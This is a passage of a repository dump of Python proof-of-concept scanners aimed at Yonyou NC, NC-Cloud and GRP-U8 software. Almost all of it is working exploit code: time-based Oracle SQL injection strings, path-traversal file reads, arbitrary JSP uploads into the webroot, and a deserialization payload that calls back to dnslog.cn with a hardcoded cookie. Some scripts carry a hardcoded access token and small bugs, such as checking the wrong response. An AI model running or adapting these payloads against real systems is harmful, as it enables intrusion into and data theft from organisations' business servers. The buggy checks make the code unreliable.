7 | 'name': '用友 GRP-U8 Proxy XXE-SQL注入漏洞',
8 | 'vulnerable': False
9 | }
10 | sqli_payload = "select @@version"
11 | randstr = ''.join(random.sample(string.digits + string.ascii_letters, 6))
12 | timeout = 5
13 | headers = {
14 | 'User-Agent': 'Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36',
15 | 'Content-Type': 'application/x-www-form-urlencoded',
16 | }
17 | vurl = urllib.parse.urljoin(url, "/Proxy")
18 | data = 'cVer=9.8.0&dp=XML AS_DataRequest ProviderNameDataSetProviderData Data{0} '
19 | try:
20 | rep = requests.post(vurl, headers=headers, timeout=timeout, data=data.format(sqli_payload), verify=False)
21 | if rep.status_code == 200 and re.search("Microsoft SQL Server", rep.text):
22 | rep2 = requests.post(vurl, headers=headers, timeout=timeout, data=data.format(randstr), verify=False)
23 | if re.search("错误代码", rep2.text) and re.search(randstr, rep2.text):
24 | result['vulnerable'] = True
25 | return result
26 | except:
27 | return result
28 |
--------------------------------------------------------------------------------
/pocs/web/OA/yongyou/nc/__pycache__/yongyou_nc-find-web_fileread.cpython-311.pyc:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/a6903147/FingerVulnScanner/726c4b66f02a19ac6f7164d343dbedc74cc90358/pocs/web/OA/yongyou/nc/__pycache__/yongyou_nc-find-web_fileread.cpython-311.pyc
--------------------------------------------------------------------------------
/pocs/web/OA/yongyou/nc/__pycache__/yongyou_nc_FileManager_fileupload.cpython-311.pyc:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/a6903147/FingerVulnScanner/726c4b66f02a19ac6f7164d343dbedc74cc90358/pocs/web/OA/yongyou/nc/__pycache__/yongyou_nc_FileManager_fileupload.cpython-311.pyc
--------------------------------------------------------------------------------
/pocs/web/OA/yongyou/nc/__pycache__/yongyou_nc_avatar_fileupload.cpython-311.pyc:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/a6903147/FingerVulnScanner/726c4b66f02a19ac6f7164d343dbedc74cc90358/pocs/web/OA/yongyou/nc/__pycache__/yongyou_nc_avatar_fileupload.cpython-311.pyc
--------------------------------------------------------------------------------
/pocs/web/OA/yongyou/nc/__pycache__/yongyou_nc_aveXmlToFIleServlet_fileupload.cpython-311.pyc:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/a6903147/FingerVulnScanner/726c4b66f02a19ac6f7164d343dbedc74cc90358/pocs/web/OA/yongyou/nc/__pycache__/yongyou_nc_aveXmlToFIleServlet_fileupload.cpython-311.pyc
--------------------------------------------------------------------------------
/pocs/web/OA/yongyou/nc/__pycache__/yongyou_nc_bill_sqli.cpython-311.pyc:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/a6903147/FingerVulnScanner/726c4b66f02a19ac6f7164d343dbedc74cc90358/pocs/web/OA/yongyou/nc/__pycache__/yongyou_nc_bill_sqli.cpython-311.pyc
--------------------------------------------------------------------------------
/pocs/web/OA/yongyou/nc/__pycache__/yongyou_nc_blobRefClassSea_rce.cpython-311.pyc:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/a6903147/FingerVulnScanner/726c4b66f02a19ac6f7164d343dbedc74cc90358/pocs/web/OA/yongyou/nc/__pycache__/yongyou_nc_blobRefClassSea_rce.cpython-311.pyc
--------------------------------------------------------------------------------
/pocs/web/OA/yongyou/nc/__pycache__/yongyou_nc_downCourseWare_lfi.cpython-311.pyc:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/a6903147/FingerVulnScanner/726c4b66f02a19ac6f7164d343dbedc74cc90358/pocs/web/OA/yongyou/nc/__pycache__/yongyou_nc_downCourseWare_lfi.cpython-311.pyc
--------------------------------------------------------------------------------
/pocs/web/OA/yongyou/nc/__pycache__/yongyou_nc_download_lfi.cpython-311.pyc:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/a6903147/FingerVulnScanner/726c4b66f02a19ac6f7164d343dbedc74cc90358/pocs/web/OA/yongyou/nc/__pycache__/yongyou_nc_download_lfi.cpython-311.pyc
--------------------------------------------------------------------------------
/pocs/web/OA/yongyou/nc/__pycache__/yongyou_nc_download_sqli.cpython-311.pyc:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/a6903147/FingerVulnScanner/726c4b66f02a19ac6f7164d343dbedc74cc90358/pocs/web/OA/yongyou/nc/__pycache__/yongyou_nc_download_sqli.cpython-311.pyc
--------------------------------------------------------------------------------
/pocs/web/OA/yongyou/nc/__pycache__/yongyou_nc_file-receive-servlet_fileupload_2021.cpython-311.pyc:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/a6903147/FingerVulnScanner/726c4b66f02a19ac6f7164d343dbedc74cc90358/pocs/web/OA/yongyou/nc/__pycache__/yongyou_nc_file-receive-servlet_fileupload_2021.cpython-311.pyc
--------------------------------------------------------------------------------
/pocs/web/OA/yongyou/nc/__pycache__/yongyou_nc_fileserver_loginbypass.cpython-311.pyc:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/a6903147/FingerVulnScanner/726c4b66f02a19ac6f7164d343dbedc74cc90358/pocs/web/OA/yongyou/nc/__pycache__/yongyou_nc_fileserver_loginbypass.cpython-311.pyc
--------------------------------------------------------------------------------
/pocs/web/OA/yongyou/nc/__pycache__/yongyou_nc_fileupload_2022.cpython-311.pyc:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/a6903147/FingerVulnScanner/726c4b66f02a19ac6f7164d343dbedc74cc90358/pocs/web/OA/yongyou/nc/__pycache__/yongyou_nc_fileupload_2022.cpython-311.pyc
--------------------------------------------------------------------------------
/pocs/web/OA/yongyou/nc/__pycache__/yongyou_nc_grouptemplet_fileupload.cpython-311.pyc:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/a6903147/FingerVulnScanner/726c4b66f02a19ac6f7164d343dbedc74cc90358/pocs/web/OA/yongyou/nc/__pycache__/yongyou_nc_grouptemplet_fileupload.cpython-311.pyc
--------------------------------------------------------------------------------
/pocs/web/OA/yongyou/nc/__pycache__/yongyou_nc_importhttpscer_fileupload.cpython-311.pyc:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/a6903147/FingerVulnScanner/726c4b66f02a19ac6f7164d343dbedc74cc90358/pocs/web/OA/yongyou/nc/__pycache__/yongyou_nc_importhttpscer_fileupload.cpython-311.pyc
--------------------------------------------------------------------------------
/pocs/web/OA/yongyou/nc/__pycache__/yongyou_nc_jsinvoke_fileupload.cpython-311.pyc:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/a6903147/FingerVulnScanner/726c4b66f02a19ac6f7164d343dbedc74cc90358/pocs/web/OA/yongyou/nc/__pycache__/yongyou_nc_jsinvoke_fileupload.cpython-311.pyc
--------------------------------------------------------------------------------
/pocs/web/OA/yongyou/nc/__pycache__/yongyou_nc_queryPsnInfo_sqli.cpython-311.pyc:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/a6903147/FingerVulnScanner/726c4b66f02a19ac6f7164d343dbedc74cc90358/pocs/web/OA/yongyou/nc/__pycache__/yongyou_nc_queryPsnInfo_sqli.cpython-311.pyc
--------------------------------------------------------------------------------
/pocs/web/OA/yongyou/nc/__pycache__/yongyou_nc_queryStaffByName_sqli.cpython-311.pyc:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/a6903147/FingerVulnScanner/726c4b66f02a19ac6f7164d343dbedc74cc90358/pocs/web/OA/yongyou/nc/__pycache__/yongyou_nc_queryStaffByName_sqli.cpython-311.pyc
--------------------------------------------------------------------------------
/pocs/web/OA/yongyou/nc/__pycache__/yongyou_nc_querygoodsgridbycode_sqli.cpython-311.pyc:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/a6903147/FingerVulnScanner/726c4b66f02a19ac6f7164d343dbedc74cc90358/pocs/web/OA/yongyou/nc/__pycache__/yongyou_nc_querygoodsgridbycode_sqli.cpython-311.pyc
--------------------------------------------------------------------------------
/pocs/web/OA/yongyou/nc/__pycache__/yongyou_nc_rce_2022.cpython-311.pyc:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/a6903147/FingerVulnScanner/726c4b66f02a19ac6f7164d343dbedc74cc90358/pocs/web/OA/yongyou/nc/__pycache__/yongyou_nc_rce_2022.cpython-311.pyc
--------------------------------------------------------------------------------
/pocs/web/OA/yongyou/nc/__pycache__/yongyou_nc_runStateServlet_sqli.cpython-311.pyc:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/a6903147/FingerVulnScanner/726c4b66f02a19ac6f7164d343dbedc74cc90358/pocs/web/OA/yongyou/nc/__pycache__/yongyou_nc_runStateServlet_sqli.cpython-311.pyc
--------------------------------------------------------------------------------
/pocs/web/OA/yongyou/nc/__pycache__/yongyou_nc_saveImageServlet_fileupload.cpython-311.pyc:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/a6903147/FingerVulnScanner/726c4b66f02a19ac6f7164d343dbedc74cc90358/pocs/web/OA/yongyou/nc/__pycache__/yongyou_nc_saveImageServlet_fileupload.cpython-311.pyc
--------------------------------------------------------------------------------
/pocs/web/OA/yongyou/nc/__pycache__/yongyou_nc_showcontent_sqli.cpython-311.pyc:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/a6903147/FingerVulnScanner/726c4b66f02a19ac6f7164d343dbedc74cc90358/pocs/web/OA/yongyou/nc/__pycache__/yongyou_nc_showcontent_sqli.cpython-311.pyc
--------------------------------------------------------------------------------
/pocs/web/OA/yongyou/nc/__pycache__/yongyou_nc_soapFormat_xxe.cpython-311.pyc:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/a6903147/FingerVulnScanner/726c4b66f02a19ac6f7164d343dbedc74cc90358/pocs/web/OA/yongyou/nc/__pycache__/yongyou_nc_soapFormat_xxe.cpython-311.pyc
--------------------------------------------------------------------------------
/pocs/web/OA/yongyou/nc/__pycache__/yongyou_nc_uploadChunk _fileupload.cpython-311.pyc:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/a6903147/FingerVulnScanner/726c4b66f02a19ac6f7164d343dbedc74cc90358/pocs/web/OA/yongyou/nc/__pycache__/yongyou_nc_uploadChunk _fileupload.cpython-311.pyc
--------------------------------------------------------------------------------
/pocs/web/OA/yongyou/nc/__pycache__/yongyou_nc_uploadControl_fileupload.cpython-311.pyc:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/a6903147/FingerVulnScanner/726c4b66f02a19ac6f7164d343dbedc74cc90358/pocs/web/OA/yongyou/nc/__pycache__/yongyou_nc_uploadControl_fileupload.cpython-311.pyc
--------------------------------------------------------------------------------
/pocs/web/OA/yongyou/nc/__pycache__/yongyou_nc_warningDetailInfo_sqli.cpython-311.pyc:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/a6903147/FingerVulnScanner/726c4b66f02a19ac6f7164d343dbedc74cc90358/pocs/web/OA/yongyou/nc/__pycache__/yongyou_nc_warningDetailInfo_sqli.cpython-311.pyc
--------------------------------------------------------------------------------
/pocs/web/OA/yongyou/nc/__pycache__/yongyou_nc_workflowImageServlet_sqli.cpython-311.pyc:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/a6903147/FingerVulnScanner/726c4b66f02a19ac6f7164d343dbedc74cc90358/pocs/web/OA/yongyou/nc/__pycache__/yongyou_nc_workflowImageServlet_sqli.cpython-311.pyc
--------------------------------------------------------------------------------
/pocs/web/OA/yongyou/nc/yongyou_nc-find-web_fileread.py:
--------------------------------------------------------------------------------
1 | import requests
2 | import urllib, re
3 |
4 | def verify(url):
5 | relsult = {
6 | 'name': '用友NC 任意文件读取(/NCFindWeb)',
7 | 'vulnerable': False,
8 | 'url': url,
9 | }
10 | timeout = 3
11 | headers = {
12 | "User-Agent": "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) ",
13 | 'Content-Type': 'application/x-www-form-urlencoded',
14 | }
15 | payload = '/NCFindWeb?service=IPreAlertConfigService&filename=/'
16 | vurl = urllib.parse.urljoin(url, payload)
17 | try:
18 | rep = requests.get(url, headers=headers, timeout=timeout, verify=False)
19 | if rep.status_code == 200 and re.search("ufida", rep.text):
20 | rep2 = requests.get(vurl, headers=headers, timeout=timeout, verify=False)
21 | if rep2.status_code == 200 and re.search(".+\.jsp", rep.text):
22 | relsult['vulnerable'] = True
23 | relsult['verify'] = vurl
24 | return relsult
25 | except:
26 | return relsult
--------------------------------------------------------------------------------
/pocs/web/OA/yongyou/nc/yongyou_nc_FileManager_fileupload.py:
--------------------------------------------------------------------------------
1 | import requests
2 | import urllib
3 |
4 | from inc.generate_random import generate_random_str
5 | def verify(url):
6 | relsult = {
7 | 'name': '用友NC系统FileManager接口存在任意文件上传漏洞',
8 | 'vulnerable': False,
9 | 'url': url
10 | }
11 | headers = {
12 | 'User-Agent': 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML,like Gecko)',
13 | 'Content-Type': 'multipart/form-data;boundary=d0b7a0d40eed0e32904c8017b09eb305'
14 | }
15 | char = generate_random_str(6)
16 | char_data = generate_random_str(15)
17 | data = f'''--d0b7a0d40eed0e32904c8017b09eb305
18 | Content-Disposition: form-data; name="file"; filename="{char}.jsp"
19 | Content-Type: text/plain
20 |
21 | <%out.print("{char_data}");%>
22 | --d0b7a0d40eed0e32904c8017b09eb305--'''
23 | vurl = urllib.parse.urljoin(url, "/pt/file/upload?pageId=login&filemanager=nc.uap.lfw.file.FileManager&iscover=true&billitem=..%5C..%5C..%5C..%5C..%5C..%5C..%5C..%5C..%5C..%5Cwebapps%5Cnc_web%5C")
24 | try:
25 | response = requests.post(vurl, headers=headers, data=data)
26 | if response.status_code == 200:
27 | vurl = url + f'/{char}.jsp'
28 | response = requests.get(vurl)
29 | if response.status_code == 200 and char_data in response.text:
30 | relsult['vulnerable'] = True
31 | relsult['verify'] = vurl
32 | return relsult
33 |
34 | except:
35 | return relsult
--------------------------------------------------------------------------------
/pocs/web/OA/yongyou/nc/yongyou_nc_avatar_fileupload.py:
--------------------------------------------------------------------------------
1 | import requests
2 | import urllib
3 |
4 | from inc.generate_random import generate_random_str
5 |
6 |
7 | def verify(url):
8 | relsult = {
9 | 'name': '用友NC-avatar接口存在文件上传漏洞',
10 | 'vulnerable': False,
11 | 'url': url
12 | }
13 | headers = {
14 | 'Content-Type': 'multipart/form-data; boundary=----WebKitFormBoundaryEXmnamw5gVZG9KAQ',
15 | 'User-Agent': 'Mozilla/5.0'
16 | }
17 | char_data = generate_random_str(10)
18 | data = f'''------WebKitFormBoundaryEXmnamw5gVZG9KAQ
19 | Content-Disposition: form-data; name="file"; filename="111.jsp"
20 | Content-Type: application/octet-stream
21 |
22 | {char_data}
23 | ------WebKitFormBoundaryEXmnamw5gVZG9KAQ--'''
24 | vurl = urllib.parse.urljoin(url, "/uapim/upload/avatar?usercode=1&fileType=jsp")
25 | try:
26 | response = requests.post(vurl, headers=headers, data=data)
27 | if response.status_code == 200 and 'true' in response.text:
28 | relsult['vulnerable'] = True
29 | relsult['verify'] = f'需要爆破路径{url}/uapim/static/pages/photo/1/1.[13位时间戳].jsp'
30 | return relsult
31 |
32 | except:
33 | return relsult
34 |
35 | verify('1')
--------------------------------------------------------------------------------
/pocs/web/OA/yongyou/nc/yongyou_nc_aveXmlToFIleServlet_fileupload.py:
--------------------------------------------------------------------------------
1 | import requests
2 | import urllib
3 |
4 | from inc.generate_random import generate_random_str
5 | def verify(url):
6 | relsult = {
7 | 'name': '用友NC接口saveXmlToFIleServlet存在文件上传',
8 | 'vulnerable': False,
9 | 'url': url
10 | }
11 | headers = {
12 | 'Content-Type': 'application/octet-stream',
13 | 'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.116 Safari/537.36'
14 | }
15 | char= generate_random_str(5)
16 | char_data = generate_random_str(15)
17 | data = f'''{char_data}'''
18 | vurl = urllib.parse.urljoin(url, f"/portal/pt/servlet/saveXmlToFileServlet/doPost?pageId=login&filename={char}.jsp%00")
19 | try:
20 | response = requests.post(vurl, headers=headers, data=data)
21 | if response.status_code == 200:
22 | vurl = url + f'/portal/processxml/{char}.jsp'
23 | response = requests.get(vurl)
24 | if response.status_code == 200 and char_data in response.text:
25 | relsult['vulnerable'] = True
26 | relsult['verify'] = vurl
27 | return relsult
28 |
29 | except:
30 | return relsult
--------------------------------------------------------------------------------
/pocs/web/OA/yongyou/nc/yongyou_nc_bill_sqli.py:
--------------------------------------------------------------------------------
1 | import requests
2 | import urllib
3 |
4 | def verify(url):
5 | relsult = {
6 | 'name': '用友NC-bill存在SQL注入漏洞',
7 | 'vulnerable': False,
8 | 'url': url
9 | }
10 | headers = {
11 | "User-Agent": "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36",
12 | 'Accept': '*/*',
13 | 'Accept-Encoding': 'gzip, deflate',
14 | 'Connection': 'keep-alive',
15 | 'Content-Type': 'application/x-www-form-urlencoded',
16 | }
17 | vurl = urllib.parse.urljoin(url, "/portal/pt/erfile/down/bill?pageId=login&id=1'+AND+4563=DBMS_PIPE.RECEIVE_MESSAGE(CHR(65),5)--")
18 | try:
19 | response = requests.get(vurl, headers=headers)
20 | if response.status_code == 500 and response.elapsed.total_seconds() > 5:
21 | relsult['vulnerable'] = True
22 | relsult['verify'] = vurl
23 | return relsult
24 |
25 | except:
26 | return relsult
--------------------------------------------------------------------------------
/pocs/web/OA/yongyou/nc/yongyou_nc_blobRefClassSea_rce.py:
--------------------------------------------------------------------------------
1 | import time
2 |
3 | import requests
4 | import urllib
5 |
6 | def verify(url):
7 | relsult = {
8 | 'name': '用友NC-Cloud接口blobRefClassSea存在反序列化漏洞',
9 | 'vulnerable': False,
10 | 'url': url
11 | }
12 | headers = {
13 | "User-Agent": "Mozilla/5.0 (X11; CrOS i686 3912.101.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/27.0.1453.116 Safari/537.36",
14 | "Content-Type": "application/json"
15 | }
16 | vurl = urllib.parse.urljoin(url, "/ncchr/pm/ref/indiIssued/blobRefClassSearch")
17 | try:
18 | getdomain = requests.get(url='http://dnslog.cn/getdomain.php',
19 | headers={"Cookie": "PHPSESSID=hb0p9iqh804esb5khaulm8ptp2"}, timeout=30)
20 | domain = str(getdomain.text)
21 | data = """{"clientParam":"{\\\"x\\\":{\\\"@type\\\":\\\"java.net.InetSocketAddress\\\"{\\\"address\\\":,\\\"val\\\":\\\"111111.%s\\\"}}}"}""" % (
22 | domain)
23 | requests.post(vurl, verify=False, headers=headers, data=data, timeout=25)
24 | for i in range(0, 3):
25 | refresh = requests.get(url='http://dnslog.cn/getrecords.php',
26 | headers={"Cookie": "PHPSESSID=hb0p9iqh804esb5khaulm8ptp2"}, timeout=30)
27 | time.sleep(1)
28 | if domain in refresh.text:
29 | relsult['vulnerable'] = True
30 | relsult['verify'] = vurl
31 | return relsult
32 |
33 | except:
34 | return relsult
35 |
36 | verify('1')
--------------------------------------------------------------------------------
/pocs/web/OA/yongyou/nc/yongyou_nc_downCourseWare_lfi.py:
--------------------------------------------------------------------------------
1 | import requests
2 | import urllib
3 |
4 | def verify(url):
5 | relsult = {
6 | 'name': '用友NC-downCourseWare任意文件读取',
7 | 'vulnerable': False,
8 | 'url': url
9 | }
10 | headers = {
11 | 'User-Agent': 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML,like Gecko)',
12 | 'Connection':'close'
13 | }
14 | vurl = urllib.parse.urljoin(url, "/portal/pt/downCourseWare/download?fileName=%2e%2e/webapps/nc_web/WEB-INF/web.xml&pageId=login")
15 | try:
16 | response = requests.get(vurl, headers=headers)
17 | if response.status_code == 200 and 'web-app' in response.text:
18 | relsult['vulnerable'] = True
19 | relsult['verify'] = vurl
20 | return relsult
21 |
22 | except:
23 | return relsult
--------------------------------------------------------------------------------
/pocs/web/OA/yongyou/nc/yongyou_nc_download_lfi.py:
--------------------------------------------------------------------------------
1 | import requests
2 | import urllib
3 |
4 | def verify(url):
5 | relsult = {
6 | 'name': '用友NC的download文件存在任意文件读取漏洞',
7 | 'vulnerable': False,
8 | 'url': url
9 | }
10 | headers = {
11 | 'User-Agent': 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML,like Gecko)',
12 | 'Connection':'close'
13 | }
14 | vurl = urllib.parse.urljoin(url, "/portal/pt/xml/file/download?pageId=login&filename=..%5Cindex.jsp")
15 | try:
16 | response = requests.get(vurl, headers=headers)
17 | if response.status_code == 200 and 'response.addHeader' in response.text:
18 | relsult['vulnerable'] = True
19 | relsult['verify'] = vurl
20 | return relsult
21 |
22 | except:
23 | return relsult
--------------------------------------------------------------------------------
/pocs/web/OA/yongyou/nc/yongyou_nc_download_sqli.py:
--------------------------------------------------------------------------------
1 | import requests
2 | import urllib
3 |
4 | def verify(url):
5 | relsult = {
6 | 'name': '用友NC接口download存在SQL注入漏洞',
7 | 'vulnerable': False,
8 | 'url': url
9 | }
10 | headers = {
11 | 'User-Agent': 'Mozilla/5.0 (Windows NT 6.2) AppleWebKit/532.1 (KHTML, like Gecko) Chrome/41.0.887.0 Safari/532.1',
12 | 'Accept': 'text/html, image/gif, image/jpeg, *; q=.2, */*; q=.2',
13 | 'Connection': 'close'
14 | }
15 | vurl = urllib.parse.urljoin(url, "/portal/pt/psnImage/download?pageId=login&pk_psndoc=1%27)%20AND%206322=DBMS_PIPE.RECEIVE_MESSAGE(CHR(65)||CHR(79)||CHR(66)||CHR(101),8)%20AND%20(%27rASZ%27=%27rASZ")
16 | try:
17 | response = requests.get(vurl, headers=headers)
18 | if response.status_code == 500 and response.elapsed.total_seconds() > 5:
19 | relsult['vulnerable'] = True
20 | relsult['verify'] = vurl
21 | return relsult
22 |
23 | except:
24 | return relsult
--------------------------------------------------------------------------------
/pocs/web/OA/yongyou/nc/yongyou_nc_fileserver_loginbypass.py:
--------------------------------------------------------------------------------
1 | import requests
2 | import urllib
3 |
4 | def verify(url):
5 | relsult = {
6 | 'name': '用友NC-Cloud文件服务器用户登陆绕过漏洞',
7 | 'vulnerable': False,
8 | 'url': url
9 | }
10 | headers = {
11 | 'User-Agent': 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML,like Gecko)',
12 | 'Connection':'close'
13 | }
14 | vurl = urllib.parse.urljoin(url, "/fs/")
15 | try:
16 | response = requests.get(vurl, headers=headers)
17 | if response.status_code == 200 and '文件服务器' in response.text:
18 | relsult['vulnerable'] = True
19 | relsult['verify'] = vurl
20 | return relsult
21 |
22 | except:
23 | return relsult
--------------------------------------------------------------------------------
/pocs/web/OA/yongyou/nc/yongyou_nc_grouptemplet_fileupload.py:
--------------------------------------------------------------------------------
1 | import requests
2 | import urllib
3 |
4 | from inc.generate_random import generate_random_str
5 | def verify(url):
6 | relsult = {
7 | 'name': '用友NC_grouptemplet文件上传漏洞',
8 | 'vulnerable': False,
9 | 'url': url
10 | }
11 | headers = {
12 | 'Content-Type': 'multipart/form-data; boundary=----WebKitFormBoundaryEXmnamw5gVZG9KAQ',
13 | 'User-Agent': 'Mozilla/5.0'
14 | }
15 | char = generate_random_str(15)
16 | data = f'''------WebKitFormBoundaryEXmnamw5gVZG9KAQ
17 | Content-Disposition: form-data; name="file"; filename="test.jsp"
18 | Content-Type: application/octet-stream
19 |
20 | <%out.println("{char}");%>
21 | ------WebKitFormBoundaryEXmnamw5gVZG9KAQ--'''
22 | vurl = urllib.parse.urljoin(url, "/uapim/upload/grouptemplet?groupid=nc&fileType=jsp&maxSize=999")
23 | try:
24 | response = requests.post(vurl, headers=headers, data=data)
25 | if response.status_code == 200:
26 | vurl = url + '/uapim/static/pages/nc/head.jsp'
27 | response = requests.get(vurl)
28 | if response.status_code == 200 and char in response.text:
29 | relsult['vulnerable'] = True
30 | relsult['verify'] = vurl
31 | return relsult
32 |
33 | except:
34 | return relsult
--------------------------------------------------------------------------------
/pocs/web/OA/yongyou/nc/yongyou_nc_jsinvoke_fileupload.py:
--------------------------------------------------------------------------------
1 | import requests
2 | import urllib
3 |
4 |
5 | def verify(url):
6 | relsult = {
7 | 'name': '用友 NC Cloud jsinvoke 任意文件上传漏洞',
8 | 'vulnerable': False,
9 | 'url': url
10 | }
11 | headers1 = {
12 | 'Content-Type': 'application/json'
13 | }
14 | data1 = '''
15 | {"serviceName":"nc.itf.iufo.IBaseSPService","methodName":"saveXStreamConfig",
16 | "parameterTypes":["java.lang.Object","java.lang.String"],
17 | "parameters":["123456","webapps/nc_web/IOmzdcUDhwMYTLk65p3cgxvxy.jsp"]}
18 | '''
19 | vurl = urllib.parse.urljoin(url, "/uapjs/jsinvoke/?action=invoke")
20 | try:
21 | response1 = requests.post(vurl, headers=headers1, data=data1)
22 | response = requests.get(url=url+'/IOmzdcUDhwMYTLk65p3cgxvxy.jsp')
23 | if response.status_code == 200 and '123456' in response.text:
24 | relsult['vulnerable'] = True
25 | relsult['verify'] = vurl
26 | return relsult
27 |
28 | except:
29 | return relsult
30 |
--------------------------------------------------------------------------------
/pocs/web/OA/yongyou/nc/yongyou_nc_queryPsnInfo_sqli.py:
--------------------------------------------------------------------------------
1 | import requests
2 | import urllib
3 |
4 | def verify(url):
5 | relsult = {
6 | 'name': '用友NC-Cloud系统queryPsnInfo存在SQL注入漏洞',
7 | 'vulnerable': False,
8 | 'url': url
9 | }
10 | headers = {
11 | 'User-Agent': 'Mozilla/5.0 (Windows NT 6.2) AppleWebKit/532.1 (KHTML, like Gecko) Chrome/41.0.887.0 Safari/532.1',
12 | 'Accesstokenncc': 'eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJ1c2VyaWQiOiIxIn0.F5qVK-ZZEgu3WjlzIANk2JXwF49K5cBruYMnIOxItOQ',
13 | 'Accept': 'text/html, image/gif, image/jpeg, *; q=.2, */*; q=.2',
14 | 'Connection': 'close'
15 | }
16 | vurl = urllib.parse.urljoin(url, "/ncchr/pm/obj/queryPsnInfo?staffid=1%27+AND+1754%3DUTL_INADDR.GET_HOST_ADDRESS%28CHR%28113%29%7C%7CCHR%28106%29%7C%7CCHR%28122%29%7C%7CCHR%28118%29%7C%7CCHR%28113%29%7C%7C%28SELECT+%28CASE+WHEN+%281754%3D1754%29+THEN+1+ELSE+0+END%29+FROM+DUAL%29%7C%7CCHR%28113%29%7C%7CCHR%28112%29%7C%7CCHR%28107%29%7C%7CCHR%28107%29%7C%7CCHR%28113%29%29--+Nzkh")
17 | try:
18 | response = requests.get(vurl, headers=headers)
19 | if 'qjzvq' in response.text:
20 | relsult['vulnerable'] = True
21 | relsult['verify'] = vurl
22 | return relsult
23 |
24 | except:
25 | return relsult
--------------------------------------------------------------------------------
/pocs/web/OA/yongyou/nc/yongyou_nc_queryStaffByName_sqli.py:
--------------------------------------------------------------------------------
1 | import requests
2 | import urllib
3 |
4 | def verify(url):
5 | relsult = {
6 | 'name': '用友NC-Cloud系统queryStaffByName存在SQL注入漏洞',
7 | 'vulnerable': False,
8 | 'url': url
9 | }
10 | headers = {
11 | 'User-Agent': 'Mozilla/5.0 (Windows NT 6.2) AppleWebKit/532.1 (KHTML, like Gecko) Chrome/41.0.887.0 Safari/532.1',
12 | 'Accesstokenncc': 'eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJ1c2VyaWQiOiIxIn0.F5qVK-ZZEgu3WjlzIANk2JXwF49K5cBruYMnIOxItOQ',
13 | 'Accept': 'text/html, image/gif, image/jpeg, *; q=.2, */*; q=.2',
14 | 'Connection': 'close'
15 | }
16 | vurl = urllib.parse.urljoin(url, "/ncchr/pm/staff/queryStaffByName?name=1%27+AND+7216%3DUTL_INADDR.GET_HOST_ADDRESS%28CHR%28113%29%7C%7CCHR%28107%29%7C%7CCHR%28112%29%7C%7CCHR%28107%29%7C%7CCHR%28113%29%7C%7C%28SELECT+%28CASE+WHEN+%287216%3D7216%29+THEN+1+ELSE+0+END%29+FROM+DUAL%29%7C%7CCHR%28113%29%7C%7CCHR%28106%29%7C%7CCHR%28118%29%7C%7CCHR%2898%29%7C%7CCHR%28113%29%29--+hzDZ")
17 | try:
18 | response = requests.get(vurl, headers=headers)
19 | if 'qkpkq1q' in response.text:
20 | relsult['vulnerable'] = True
21 | relsult['verify'] = vurl
22 | return relsult
23 |
24 | except:
25 | return relsult
--------------------------------------------------------------------------------
/pocs/web/OA/yongyou/nc/yongyou_nc_querygoodsgridbycode_sqli.py:
--------------------------------------------------------------------------------
1 | import requests
2 | import urllib
3 |
4 | def verify(url):
5 | relsult = {
6 | 'name': '用友NC系统querygoodsgridbycode接口code参数存在SQL注入漏洞',
7 | 'vulnerable': False,
8 | 'url': url
9 | }
10 | headers = {
11 | 'Accept-Encoding': 'gzip, deflate',
12 | 'Upgrade-Insecure-Requests': '1',
13 | 'Pragma': 'no-cache',
14 | 'Accept-Language': 'zh-CN,zh;q=0.9',
15 | 'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/125.0.0.0 Safari/537.36',
16 | 'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7',
17 | 'Cache-Control': 'no-cache'
18 | }
